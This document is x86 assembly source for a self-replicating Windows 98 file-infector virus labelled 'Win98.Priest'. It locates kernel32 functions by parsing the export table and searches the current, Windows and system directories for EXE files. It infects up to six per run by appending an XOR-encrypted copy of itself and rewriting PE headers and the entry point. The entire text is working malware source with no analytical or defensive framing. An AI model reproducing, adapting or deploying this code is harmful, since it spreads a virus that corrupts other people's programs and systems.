; Win98.Priest
.386
.model flat
extrn      ExitProcess:PROC
KER32 equ 0bff70000h
Limit equ 0000h
addname equ 0004h
addfun  equ 0008h
addord  equ 000Ch
create  equ 0010h
close   equ 0014h
rfile   equ 0018h
ffind   equ 001ch
nfind   equ 0020h
white   equ 0024h
fpoin   equ 0028h
getw    equ 002ch
gets    equ 0030h
getc    equ 0034h
srchc   equ 0038h
getp    equ 003ch
shand   equ 0040h
fhand   equ 0044h
reads   equ 0048h
OLDEDI  equ 004ch
chkif   equ 0050h
chkdi   equ 0054h
WICHI   equ 0058h
exew    equ 005ch
DATAA   equ 0200h
heads   equ 0300h
.code
Start_Virus:
Call Delta_Offset
Delta_Offset:
Pop Ebp
Sub Ebp,Offset Delta_Offset
pushad
KEY_CODE:
mov EAX,00h
LEA eSI,[VIRUS_BODY+EBP]
mov ecx,End_Virus - VIRUS_BODY -4
KEYCODE:
XOR DWORD ptr [esi],eax
add esi,1
xchg al,ah
ror eax,1
loop KEYCODE
VIRUS_BODY:
popad
push eax
mov eax,[OLDIP+ebp]
add eax,400000h
push eax
call Scan_DATA
mov EDI,ESI
add ESI,6
cmp word ptr [esi],0
je  R_IP
xor ecx,ecx
mov cx,[esi]
add ESI,0f2h
add ESI,24h
add edi,0f8h
CHk_se:
mov eax,[esi]
and eax,0c0000000h
cmp eax,0c0000000h
jne Next_Se
mov eax,[edi+8h]
mov ebx,511
add eax,ebx
xor edx,edx
inc ebx
div ebx
mul ebx
sub eax,[edi+10h]
cmp eax,700h+(W_ENC_END - W_ENC)
jge  OK_SE
Next_Se:
add esi,28h
add edi,28h
loop CHk_se
JMP R_IP
OK_SE:
mov esi,[edi+0ch]
add esi,[edi+10h]
add esi,400000h
mov ebp,ESI
xor eax,eax
mov esi,KER32+3ch
lodsw
add eax,KER32
cmp dword ptr [eax],00004550h
jne R_IP
mov esi,[eax+78h]
add esi,24
add esi,KER32
lodsd
add eax,KER32
mov [ebp+Limit],eax
lodsd
add eax,KER32
mov [ebp+addfun],eax
lodsd
add eax,KER32
mov [ebp+addname],eax
lodsd
add eax,KER32
mov [ebp+addord],eax
pop eax
pop ebx
push ebx
push eax
mov esi,ebx
add esi,offset gp - Start_Virus
mov ebx,esi
mov edi,[ebp+addname]
mov edi,[edi]
add edi,KER32
xor ecx,ecx
call FIND_SRC
shl ecx,1
mov esi,[ebp+addord]
add esi,ecx
xor eax,eax
mov ax,word ptr [esi]
shl eax,2
mov esi,[ebp+addfun]
add esi,eax
mov edi,[esi]
add edi,KER32
mov [getp+ebp],edi
mov ebx,create
pop eax
pop edi
push edi
push eax
add edi,offset cf - Start_Virus
FIND_FUN:
push edi
push KER32
call [getp+ebp]
mov [ebx+ebp],eax
add ebx,4
cmp ebx,getp
je  OK_FIND_FILE
mov al,0
repne scasb
jmp FIND_FUN
OK_FIND_FILE:
lea eax,[ebp+exew]
push eax
push 100h - 58h
call [getc+ebp]
or eax,eax
je CHG_DIR
OK_EXE:
lea esi,[ebp+DATAA]
push esi
lea edi,[ebp+exew]
push edi
scan_dir:
cmp byte ptr [edi],00h
je ok_make_exe
add edi,1
jmp scan_dir
ok_make_exe:
mov al,''
stosb
mov dword ptr [ebp+WICHI],edi
mov ax,'.*'
stosw
mov eax,'EXE'
stosd
call [ebp+ffind]
mov [ebp+shand],eax
cmp eax,-1
je R_IP
mov eax,0
open_file:
cmp byte ptr [ebp+DATAA+2ch+eax],'v'
je NEXT_FILE
cmp byte ptr [ebp+DATAA+2ch+eax],'n'
je NEXT_FILE
cmp byte ptr [ebp+DATAA+2ch+eax],'V'
je NEXT_FILE
cmp byte ptr [ebp+DATAA+2ch+eax],'N'
je NEXT_FILE
cmp byte ptr [ebp+DATAA+2ch+eax],0
je open_file_start
add eax,1
jmp open_file
open_file_start:
mov edi,dword ptr [ebp+WICHI]
mov ecx,20
lea esi,[ebp+DATAA+2ch]
repz movsb
push 0
push 0
push 3
push 0
push 0
push 0c0000000h
lea eax,[ebp+exew]
push eax
call [ebp+create]
mov [ebp+fhand],eax
cmp eax,-1
je File_Close
mov ecx,400h
lea edx,[ebp+heads]
lea eax,[ebp+reads]
push 0
push eax
push ecx
push edx
push dword ptr [ebp+fhand]
call [ebp+rfile]
cmp eax,0
je File_Close
cmp word ptr [ebp+heads],'ZM'
jne File_Close
xor eax,eax
lea esi,[ebp+heads+3ch]
lodsw
add eax,ebp
add eax,heads
mov esi,eax
lea ebx,[ebp+heads+400h]
cmp eax,ebx
jg  File_Close
cmp word ptr [eax],'EP'
jne File_Close
cmp dword ptr [eax+34h],400000h
jne File_Close
cmp word ptr [ebp+heads+12h],'^^'
je File_Close
cmp word ptr [esi+6],6
jg File_Close
xor ecx,ecx
mov edi,esi
mov cx,word ptr [esi+6]
add edi,0f8h
CHK_DATA:
add edi,24h
mov eax,dword ptr [edi]
and eax,0c0000000h
cmp eax,0c0000000h
je  OK_INFECT
add edi,4h
loop CHK_DATA
jmp File_Close
OK_INFECT:
mov eax,[ebp+DATAA+20h]
call F_SEEK
mov edi,[esi+28h]
pop ebx
pop eax
push eax
push ebx
add eax,offset OLDIP - Start_Virus
mov dword ptr [eax],edi
mov eax,offset End_Virus - Start_Virus
mov ecx,[esi+3ch]
add eax,ecx
xor edx,edx
div ecx
mul ecx
add dword ptr [esi+50h],eax
mov ecx,eax
pop eax
pop ebx
mov edx,ebx
push ebx
push eax
push ecx
push ecx
mov ecx,End_Virus - Start_Virus
pushad
push edx
add edx,offset W_ENC - Start_Virus
mov esi,edx
lea ebp,[ebp+heads]
add ebp,400h
mov edi,ebp
push edi
mov cx,offset W_ENC_END - W_ENC
repz movsb
pop edi
jmp edi
r_body:
popad
pop ecx
sub ecx,offset End_Virus - Start_Virus
mov edx,400000h
call fwrite
mov eax,[ebp+DATAA+20h]
mov ecx,[esi+3ch]
mov edx,0
div ecx
push edx
push eax
mov edi,esi
mov ax,word ptr [esi+6]
sub eax,1
mov ecx,28h
mul ecx
add eax,0f8h
add edi,eax
xor edx,edx
mov eax,[edi+14h]
mov ecx,[esi+3ch]
div ecx
pop edx
sub edx,eax
push edx
mov eax,[edi+10h]
sub eax,1
add eax,ecx
xor edx,edx
div ecx
mov ebx,eax
pop eax
sub eax,ebx
mul ecx
pop edx
add eax,edx
add dword ptr [esi+50h],eax
mov ebx,[edi+0ch]
add ebx,[edi+10h]
add ebx,eax
mov [esi+28h],ebx
pop ebx
add ebx,eax
add [edi+8h],ebx
add [edi+10h],ebx
mov [edi+24h],0c0000040h
mov word ptr [ebp+heads+12h],'^^'
mov eax,0
call F_SEEK
lea edx,[ebp+heads]
mov ecx,400h
call fwrite
inc dword ptr chkif[ebp]
File_Close:
push dword ptr [ebp+fhand]
call [ebp+close]
cmp dword ptr chkif[ebp],6
je CHG_DIR
NEXT_FILE:
lea eax,[ebp+DATAA]
push eax
push dword ptr [ebp+shand]
call [ebp+nfind]
cmp eax,0
je CHG_DIR
jmp open_file
CHG_DIR:
push dword ptr [shand+ebp]
call [ebp+srchc]
cmp dword ptr chkif[ebp],6
je R_IP
cmp dword ptr chkdi[ebp],1
jg CHG_DIR_2
add dword ptr chkdi[ebp],2
push 100h-58h
lea eax,[ebp+exew]
push eax
call [ebp+getw]
or eax,eax
je CHG_DIR_2
jmp OK_EXE
CHG_DIR_2:
cmp dword ptr chkdi[ebp],2
jg R_IP
add dword ptr chkdi[ebp],1
push 100h-58h
lea eax,[ebp+exew]
push eax
call [ebp+gets]
or eax,eax
je R_IP
jmp OK_EXE
Scan_DATA:
mov esi,400000h
mov cx,600h
Scan_PE:
cmp dword ptr [esi],00004550h
je R_CO
inc esi
loop Scan_PE
R_IP:
pop eax
pop ebx
jmp eax
R_CO:
ret
FIND_SRC:
mov esi,ebx
X_M:
cmpsb
jne FIND_SRC_2
cmp byte ptr [edi],0
je R_CO
jmp X_M
FIND_SRC_2:
inc cx
cmp cx,[ebp+Limit]
jge NOT_SRC
add dword ptr [ebp+addname],4
mov edi,[ebp+addname]
mov edi,[edi]
add edi,KER32
jmp FIND_SRC
NOT_SRC:
pop esi
jmp R_IP
F_SEEK:
push 0
push 0
push eax
push dword ptr [ebp+fhand]
call [ebp+fpoin]
ret
W_ENC:
in al,40h
xchg al,ah
in al,40h
add eax,edi
add edi,offset ENCRY_E - W_ENC +1
mov dword ptr [edi],eax
pop edx
add edx,offset KEY_CODE - Start_Virus +1
mov dword ptr [edx],eax
popad
pushad
mov esi,edx
add esi,offset VIRUS_BODY - Start_Virus
mov ecx,offset End_Virus - VIRUS_BODY -4
call ENCRY_E
popad
pushad
call fwrite
popad
pushad
mov esi,edx
add esi,offset VIRUS_BODY - Start_Virus
mov ecx,offset End_Virus - VIRUS_BODY -4
call ENCRY_E
popad
pushad
add edx,offset r_body - Start_Virus
jmp edx
ENCRY_E:
mov eax,00h
ENCRY:
xor dword ptr [esi],eax
xchg al,ah
ror eax,1
inc esi
loop ENCRY
ret
fwrite:
push 0
lea eax,[ebp+reads]
push eax
push ecx
push edx
push dword ptr [ebp+fhand]
call [ebp+white]
ret
W_ENC_END:
cf db 'CreateFileA',0
cl db '_lclose',0
rf db 'ReadFile',0
ff db 'FindFirstFileA',0
fn db 'FindNextFileA',0
wf db 'WriteFile',0
sf db 'SetFilePointer',0
gw db 'GetWindowsDirectoryA',0
gs db 'GetSystemDirectoryA',0
gc db 'GetCurrentDirectoryA',0
fc db 'FindClose',0
gp db 'GetProcAddress',0
vn db 'Win98.Priest'
   db 'SVS/COREA/MOV'
OLDIP  dd F_END - 400000h
End_Virus:
F_END:
push 0
call ExitProcess

end Start_Virus